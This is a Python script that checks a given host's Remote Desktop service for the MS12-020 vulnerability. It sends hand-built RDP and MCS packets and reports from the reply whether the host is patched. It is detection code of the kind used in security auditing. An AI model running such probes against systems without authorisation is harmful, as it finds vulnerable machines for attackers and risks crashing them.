MS12-020/CVE-2012-0002 Vulnerability Tester
#!/usr/bin/env python | |
""" | |
MS12-020/CVE-2012-0002 Vulnerability Tester | |
based on sleepya's version @ http://pastebin.com/Ks2PhKb4 | |
""" | |
import socket | |
import struct | |
import sys | |
from binascii import hexlify, unhexlify | |
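def _recv_reply(skt, min_len):
    """Receive one reply from *skt* and abort if it is shorter than *min_len*.

    The probe below slices fixed offsets out of each reply; slicing a short or
    empty reply would otherwise surface as a confusing ValueError/struct.error
    (or send a malformed follow-up packet).  A truncated reply is reported and
    the run is aborted with SystemExit(1) instead.
    """
    data = skt.recv(8192)
    if len(data) < min_len:
        print("ERROR: short or empty reply from server (%d bytes)" % len(data))
        raise SystemExit(1)
    return data


def exploit(host, port):
    """Probe the RDP service at host:port for the MS12-020 (CVE-2012-0002) patch state.

    Sends the X.224 connection request, the MCS Connect-Initial PDU, two
    Attach User requests and a Channel Join request, then prints whether the
    join was accepted (bytes 7:9 of the reply == 0x3e00, i.e. unpatched) or
    refused (patched).  The socket is closed on every exit path.

    Args:
        host: target host name or IPv4 address.
        port: TCP port of the RDP listener.

    Raises:
        SystemExit(1): the first reply is not one of the two known RDP
            Connection Confirm replies, or a later reply is truncated.
        socket.error / socket.timeout: propagated unchanged from the
            connection (after the socket has been closed).
    """
    # See http://msdn.microsoft.com/en-us/library/cc240836%28v=prot.10%29.aspx
    connection_request = unhexlify(''.join([
        "0300",  # TPKT Header version 03, reserved 0
        "0013",  # Length
        "0e",  # X.224 Data TPDU length
        "e0",  # X.224 Type (Connection request)
        "0000",  # dst reference
        "0000",  # src reference
        "00",  # class and options
        "01",  # RDP Negotiation Message
        "00",  # flags
        "0800",  # RDP Negotiation Request Length
        "00000000"  # RDP Negotiation Request
    ]))
    initial_pdu = unhexlify(''.join([
        "03000065",  # TPKT Header
        "02f080",  # Data TPDU, EOT
        "7f655b",  # Connect-Initial
        "040101",  # callingDomainSelector
        "040101",  # calledDomainSelector
        "0101ff",  # upwardFlag
        "3019",  # targetParams + size (25 bytes)
        "020122",  # maxChannelIds
        "020120",  # maxUserIds
        "020100",  # maxTokenIds
        "020101",  # numPriorities
        "020100",  # minThroughput
        "020101",  # maxHeight
        "0202ffff",  # maxMCSPDUSize
        "020102",  # protocolVersion
        "3018",  # minParams + size (24 bytes)
        "020101",  # maxChannelIds
        "020101",  # maxUserIds
        "020101",  # maxTokenIds
        "020101",  # numPriorities
        "020100",  # minThroughput
        "020101",  # maxHeight
        "0201ff",  # maxMCSPDUSize
        "020102",  # protocolVersion
        "3019",  # maxParams + size (25 bytes)
        "0201ff",  # maxChannelIds
        "0201ff",  # maxUserIds
        "0201ff",  # maxTokenIds
        "020101",  # numPriorities
        "020100",  # minThroughput
        "020101",  # maxHeight
        "0202ffff",  # maxMCSPDUSize
        "020102",  # protocolVersion
        "0400",  # userData
    ]))
    user_request = unhexlify(''.join([
        "0300",  # header
        "0008",  # length
        "02f080",  # X.224 Data TPDU (2 bytes: 0xf0 = Data TPDU, 0x80 = EOT)
        "28",  # PER encoded PDU contents
    ]))
    channel_join_request = unhexlify("0300000c02f08038")

    skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    skt.settimeout(10)
    # try/finally so the socket is released on the "not RDP" abort, on a
    # timeout and on any other exception, not only on the happy path.
    try:
        skt.connect((host, port))
        # sendall(): plain send() may write only part of the buffer.
        skt.sendall(connection_request)
        data = skt.recv(8192)
        if data != unhexlify("0300000b06d00000123400") \
                and data != unhexlify("030000130ed000001234000201080000000000"):
            print("ERROR: This isn't RDP")
            raise SystemExit(1)
        skt.sendall(initial_pdu)
        # Send attach user request; the user id is at bytes 9:11 of the reply.
        skt.sendall(user_request)
        data = _recv_reply(skt, 11)
        user1 = data[9:11]
        # Send another attach user request
        skt.sendall(user_request)
        data = _recv_reply(skt, 11)
        user2_int = int(hexlify(data[9:11]), base=16)
        user2 = struct.pack('!H', user2_int + 1001)
        # Send channel join request
        skt.sendall(channel_join_request + user1 + user2)
        data = _recv_reply(skt, 9)
        if data[7:9] == "\x3e\x00":
            # 0x3e00 indicates a successful join; this service is vulnerable
            print("This device is vulnerable")
            # Complete request to prevent BSOD
            skt.sendall(channel_join_request + struct.pack('!H', user2_int) + user2)
            data = skt.recv(8192)
        else:
            # Patched
            print("This device is not vulnerable to MS12-020.")
    finally:
        skt.close()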
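if __name__ == '__main__':
    # Fail with a usage line (exit status 2) instead of an IndexError /
    # ValueError traceback when the arguments are missing or the port is
    # not numeric.
    if len(sys.argv) != 3 or not sys.argv[2].isdigit():
        print("Usage: %s <host> <port>" % sys.argv[0])
        raise SystemExit(2)
    exploit(sys.argv[1], int(sys.argv[2]))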
# vim: set expandtab ts=2 sw=2: |